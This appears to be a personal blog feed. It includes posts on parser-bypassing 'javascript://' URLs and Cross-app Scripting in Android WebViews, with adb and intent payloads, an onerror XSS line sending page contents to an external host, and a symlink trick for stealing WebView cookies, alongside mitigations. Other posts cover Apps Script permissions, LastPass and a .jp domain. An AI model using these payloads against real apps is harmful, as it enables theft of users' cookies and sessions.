So on first look this doesn’t even look like an open redirect. However parse_url() accepts anything for protocol, as long as the string looks like a URL. So javascript://example.com/path will be parsed into the hostname of example.com. However when this is injected, everything after javascript: is interpreted as JavaScript, namely: //example.com/path, which is entirely a comment in JavaScript. Fortunately we can inject a URL encoded new-line (%0a) to end the comment and add arbitrary JavaScript code:

javascript://example.com/path%0aalert(document.domain)

This affects other URL parsers, for example Golang (based on gobyexample.com):

package main

import (
	"fmt"
	"net/url"
)

func main() {
	s := "javascript://example.com/path%0aalert(document.domain)"
	u, err := url.Parse(s)
	if err != nil {
		panic(err)
	}
	fmt.Println(u.Host)
}

Demo

Or Java (based on this thread):

import java.net.URI;

public class Main
{
	public static void main(String[] args) {
	    try {
    	    URI uri = new URI("javascript://example.com/path%0aalert(document.domain)");
	    	System.out.println(uri.getHost());
	    } catch(Exception e) {
	        System.out.println(e);
	    }
	}
}

Demo

Cross-app Scripting in Android apps

2021-05-10T11:45:00+00:00

If an Android app accepts Intents to open a URL in a WebView, then a malicious app installed on the same device might open a javascript:alert(1)-like URL, which will run the provided JavaScript in the context of the victim app’s site (that is currently loaded in the WebView). This vulnerability is called Cross-app Scripting.

Background: Intents

On Android, intents are a way for an app to ask another app to do something. There are explicit intents that specify the exact class to be run (“hey, open this place in Google Maps”) or implicit intents that only say what they want to get done and not by whom (“hey, take a photo with any app” or “open this URL in any browser”). If multiple apps offer to handle the implicit intent, Android will ask the user which app they want to use.

Intents are usually defined in the Manifest, e.g.:

<intent-filter>
    <data android:scheme="http" />
    <data android:scheme="https" />
    <data android:host="example.com" />
    <action android:name="android.intent.action.VIEW" />
    <category android:name="android.intent.category.DEFAULT" />
    <category android:name="android.intent.category.BROWSABLE" />
</intent-filter>

One can also try to find them by looking for where they are invoked by searching for e.g. "new Intent" or "import android.content.Intent;", e.g.:

final Intent switchToExternalIntent = new Intent(this, ExternalActivity.class)
    .putExtra("url", url)
    .putExtra("shareUrl", shareUrl)
    .putExtra("shareMessage", shareMessage)
startActivityForResult(switchToExternalIntent, RequestCodes.EXTERNAL_ACTIVITY_RESULT_CODE);

final Intent shareIntent = new Intent(Intent.ACTION_SEND);
shareIntent.setType("text/plain");
shareIntent.putExtra(Intent.EXTRA_TEXT, url);
context.startActivity(shareIntent);

Calling an intent

With adb one can call Intents directly, e.g.:

adb shell am start -n com.example.myapp/com.example.myapp.MainActivity -a "android.intent.action.VIEW" -d "'javascript:alert(document.cookie)'"

The parameters are:

com.example.myapp - is the application id of the app
com.example.myapp.MainActivity - the package and class name to be called (e.g. the activity’s code might look like: "package com.example.myapp; .... public class MainActivity")
android.intent.action.VIEW is the action defined in the manifest like <action android:name="android.intent.action.VIEW" /> (sometimes it works without specifying this)
-d sets the data

adb is ideal for testing, however let’s not forget that a real-life malicious app would send the same Intent from Java like this:

Intent i = new Intent();
i.setAction("android.intent.action.VIEW");
i.setClassName("com.example.myapp","com.example.myapp.MainActivity");
i.setData(Uri.parse("javascript:alert(document.cookie)"));
startActivity(i);

Extras

In addition to the main data of an Intent, extra parameters can be passed either via the putExtra() Java call or with the --eX flags of abd depending on the type of the data:

--es for string
--eu for URI
--ez for boolean
--ei for integer
--el for long
--ef for float

More options: https://developer.android.com/studio/command-line/adb#IntentSpec

Example:

adb shell am start -n "com.example.myapp/com.example.myapp.MainActivity" --es url "javascript:alert\(document.cookie\)" --es "app.subject_id" "1234" --eu "android.intent.extra.REFERRER" "android-app:\/\/com.example.myapp"

Same in Java:

Intent i = new Intent();
i.setAction("android.intent.action.VIEW");
i.setClassName("com.example.myapp","com.example.myapp.MainActivity");
i.putExtra(Intent.EXTRA_REFERRER, Uri.parse("android-app://com.example.myapp"));
i.putExtra("app.subject_id", 1234);
i.putExtra("url","javascript:alert(document.cookie)");
startActivity(i);

Referer-spoofing

Intents can contain an EXTRA_REFERRER field, and it seems reasonable to check that to ensure only trusted apps can send requests to our app, however this parameter can be easily spoofed by a malicious app (as shown above).

Impact: I have all your cookies

The impact of XSS is generally reduced by the httpOnly cookie flag, however there is a clever trick to bypass this and get all cookies from a WebView. (This is mentioned in Google’s description too.)

A WebView uses it’s own set of cookies that are stored in the /data/data/package_name/app_webview/Cookies SQLite file. As this is in the app’s own folder, it is only accessible by the app itself.

The attack works like this:

The malicious app opens a malicios site within the victim app’s WebView
This site creates a cookie for it’s own domain and sets the cookie value to an XSS payload, e.g. <img src=x onerror='this.src = "https://example.com/?" + encodeURIComponent(document.getElementsByTagName("html")[0].innerHTML)'> (this takes the entire page and sends it to an external site)
This cookie gets stored in /data/data/package_name/app_webview/Cookies along with all the other cookies (this might take a few seconds, so the malicious app might need to wait up to 20-30 seconds)
The malicious app creates a symlink to this file, e.g. ln -s /data/data/package_name/app_webview/Cookies /tmp/symlink.html (even though the malicous app can’t access the cookies file directly, it can make the symlink)
The malicious app opens file:///tmp/symlink.html in the WebView. Since the Cookies file is owned by the app, it can access it.
Since the file extension is html, the WebView will look for any HTML code and interpret it as such. The file is an SQLite database file, so it has a lot of non-ASCII bytes, however the cookie values appear in clear text, thus the HTML code injected in step 2 runs.
The injected JavaScript takes the entire content of the file and sends it to an external server. This contains all cookies from the WebView.

The mobile security concept is very different from the desktop: on desktop if a user runs a malicious app, that’s (almost) game over (e.g. they can usually start a keylogger, steal the browser’s cookie jars etc.). On mobile however it is expected that apps and user data is protected even against a malicious app (e.g. see the fine-tuned permission system). To exploit an intent-based issue, the attacker needs to convince the user to install the attacker’s app on their phone, which does reduce the risk, however because of the expectation of apps being separated, we generally still need to consider (and fix) these issues.

Solution 1: disable calling intents from other apps

This is the first recommendation by Google too:

Find any Activities with affected WebViews. If these Activities do not need to take Intents from other apps you can set android:exported=false for the Activities in your Manifest. This ensures that malicious apps cannot send harmful inputs to any WebViews in these activities.

However sometimes this is not an option, e.g. some apps send push notifications to the user, and uppon clicking on those, they send an Intent to the app asking it to open a specific page in the app’s WebView showing e.g. a promotion.

Solution 2: only open trusted links

Have an allowlist of domains and check that the URL from the Intent starts with the entire domain, e.g. https://example.com/. The trailing / is important, otherwise https://example.com.attacker.com would be accepted.

Accepting any subdomains

If all subdomains of a trusted domain need to be accepted, it’s tempting to parse the URL and then ensure that the hostname ends with .example.com (leading . is important, otherwise attackerexample.com would be accepted). However make sure to check the protocol too, otherwise this might get accepted: javascript://mysite.example.com/%0aalert(1). But more on this trick in another post.

Restricting Google App Script permissions

2021-05-10T09:30:00+00:00

Google Apps Script is a rapid application development platform that makes it fast and easy to create business applications that integrate with Google Workspace. You write code in modern JavaScript and have access to built-in libraries for favorite Google Workspace applications like Gmail, Calendar, Drive, and more.

https://developers.google.com/apps-script/overview

Google Apps Script provide an easy way to automate repetitive tasks in the Google ecosystem (e.g. Drive). It is somewhat similar to macros in Microsoft Office. An App Script will ask for permissions before it can interact with any document of the user, and by default these permissions are unnecessarily wide. This write up is meant to help restricting these permissions.

Script types

Standalone

A standalone script is any script that is not bound to a Google Sheets, Docs, Slides, or Forms file or Google Sites. These scripts appear among your files in Google Drive.

https://developers.google.com/apps-script/guides/standalone

Container-bound Scripts

A script is bound to a Google Sheets, Docs, Slides, or Forms file if it was created from that document rather than as a standalone script. The file a bound script is attached to is referred to as a “container”. Bound scripts generally behave like standalone scripts except that they do not appear in Google Drive, they cannot be detached from the file they are bound to, and they gain a few special privileges over the parent file.

https://developers.google.com/apps-script/guides/bound

For most use-cases Container-bound Scripts are a better fit.

Permissions the script asks for

Apps Script determines the authorization scopes (like access your Google Sheets files or Gmail) automatically, based on a scan of the code. Code that is commented out can still generate an authorization request. If a script needs authorization, you’ll see one of the authorization dialogs shown here when it is run. Scripts that you have previously authorized also ask for additional authorization if a code change adds new services.

https://developers.google.com/apps-script/guides/services/authorization

When authorizing a script it will ask access to all documents in the user’s Drive, even if the script is bound to a single document and only interacting with that document:

Once it’s authorized, it can access other documents from the user’s Drive by e.g.:

var ss = SpreadsheetApp.openById("15MDqa36NGq2nsLuQKT62lKWS-v7yLMf6UXQT-l7yDDs");
Logger.log(ss.getName());

This is not optimal, as the script should only be asking for the permissions it needs.

Solution 1: `@OnlyCurrentDoc`

Include the following comment in the beginning of your script:

/**
 * @OnlyCurrentDoc
 */

From: https://developers.google.com/apps-script/guides/services/authorization#manual_authorization_scopes_for_sheets_docs_slides_and_forms

Solution 2: Define the permissions manually

Google tries to guess the permissions your script needs, but you can override that and define the permissions manually by editing the manifest file.

The Apps Script editor hides manifest files by default in order to protect your Apps Script project settings. Follow these steps to make a hidden project manifest visible in the Apps Script editor:

Open the script project in the Apps Script editor.

Select View > Show project manifest.

https://developers.google.com/apps-script/concepts/manifests

And add the following line to the the json (for a script that should only interact with the spreadsheet it is bound to):

"oauthScopes": ["https://www.googleapis.com/auth/spreadsheets.currentonly"]

Either of these options will restrict the scope to the single document and in turn change the authorization screen to:

If you need more permissions (e.g. access to an other file), this seems like a good place to start: https://stackoverflow.com/a/57564752/8590802

Permissions on changing the scripts

Slightly unrelated security note: for bound scripts the permissions are the same as the file they are bound to:

All container-bound scripts use the same owner, viewer, and editor access list defined for the container file. The container owner takes ownership of a new script project regardless of who created it. Only users who have permission to edit a container can run its bound script. Collaborators who have only view access cannot open the script editor, although if they make a copy of the parent file, they become the owner of the copy and will be able to see and run a copy of the script.

https://developers.google.com/apps-script/guides/bound#access_to_bound_scripts

So only give edit access to the file to people you trust, and don’t store anything sensitive in the script’s code.

Using LastPass on login forms with more than 2 inputs

2021-05-10T08:55:00+00:00

LastPass generally handles common login pages with a username and password well, but it breaks on login forms that have more than those two fields. But there is a solution.

The problem

Here is the site I’ll use as an example: the login page of the SMBC bank: [https://direct.smbc.co.jp/aib/aibgsjsw5001.jsp]

The first line gives 2 options for identifying your user: either specify your bank account number (branch code and account number) or use your contractor number. I’m using the first one, so let’s focus on that. The problem is that the branch code and the account numbers are two separate text boxes, thus when I fill them out and login, then LastPass will only save one of them as username.

Edit the Form Fields

There is a feature of LastPass that solves this issue. Go to edit the login entry. On the bottom left there is a wrench icon, click that:

This will bring up a window like this (this already has two extra form fields added by me):

Here you can add any number of form fields to be filled in when filling in the login form. For each element you can specify:

Field name: use the name attribute of the input html tag (e.g. for <input type="tel" name="S_ACCNT_NO" id="S_ACCNT_NO" maxlength="7" tabindex="2"> use S_ACCNT_NO)
Field type: I guess this is used to match the input type, although selecting Text for the above input (type='tel') works
Field value: whatever you want to be filled in (e.g. branch code, account number)

Save it and enjoy the fields being filled with the right input.

Getting a .jp domain

2021-05-09T05:13:00+00:00

I have a super common family name in Hungary: Szabo. It means tailor, and appr. 2% of Hungarians have this family name (203,126 out of 9,730,000). Thus szabo.hu, szabo.eu, szabo.com, szabo.net, szabo.info, szabo.me, szabo.xyz etc. are mostly taken. However I recently checked and szabo.jp was available! Following a Tokyo Cheapo guide I found Star Domain and bought the domain there for 2560 yen/year. (Star Domain has a referral program, so if you use this link, I might earn a little money.)

I already had hosting elsewhere, so I only needed the domain and Star Domain has a pretty straightforward DNS configurator. I read that only people in Japan can register .jp domains, so I expected some verification, but only my phone number was checked and after I paid for the domain, I could use it immediately.

Most part of the site is text based, so Google Translate makes it possible to use it without knowing too much Japanese.

Revive this blog

2021-05-09T03:03:00+00:00

After being rejected from ADDress, I abandoned this blog and focused on my blog in Hungarian. However a lot has changed recently, and I feel the need of a place to publish in English. Thus I decided to reuse this blog, but shift the focus from the original digital nomad life to more general life in Japan with occasional tech related articles. For this reason I also got a new domain name: szabo.jp. Szabo (read as サボー) being my family name.

Enjoy!